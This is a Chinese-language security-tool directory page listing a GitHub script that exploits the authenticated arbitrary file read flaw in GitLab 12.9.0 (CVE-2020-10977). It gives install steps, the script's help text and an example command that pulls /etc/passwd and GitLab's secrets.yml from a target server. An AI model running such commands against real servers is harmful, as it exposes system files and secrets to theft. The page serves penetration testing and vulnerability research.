Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
gitlab-12.9.0-file-read — 一个(希望是)比 exploit-db 上关于 GitLab v12.9.0 (CVE-2020-10977) 的认证任意文件读取脚本更好的脚本。 | Kitploit
工具/GitHubGitHub/erk3/gitlab-12.9.0-file-read
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHuberk3/gitlab-12.9.0-file-read

gitlab-12.9.0-file-read

一个(希望是)比 exploit-db 上关于 GitLab v12.9.0 (CVE-2020-10977) 的认证任意文件读取脚本更好的脚本。

查看仓库
5年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

警告

仅用于演示目的和道德黑客行为。

说明

一个(试图)比 exploit-db 上关于 GitLab v12.9.0(CVE-2020-10977)的已认证任意文件读取脚本更好的脚本。

使用方法

  1. 满足依赖(你可能已经安装了其余部分)

pip3 install requests python-gitlab

  1. 使用你的凭据获取一个API令牌

https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html

  1. 收获?
root@kitploit:~
$ python3 gitlab-12.9.0-lfi.py -h
usage: gitlab-12.9.0-lfi.py [-h] -H HOST -u USER -p PASSWD -t TOKEN -f FILES

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  The https URI to gitlab webroot
  -u USER, --user USER  The user name
  -p PASSWD, --passwd PASSWD
                        The user password
  -t TOKEN, --token TOKEN
                        The access token
  -f FILES, --files FILES
                        The absolute paths to the files on the Gitlab local system
root@kitploit:~
$ python3 gitlab-12.9.0-file-read.py -H https://gitlab.domain.com/ -u erk3 -p test1234 -t 9nsDFXshb1txxkkZAv24 -f /etc/passwd -f /etc/hosts -f /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
下载工具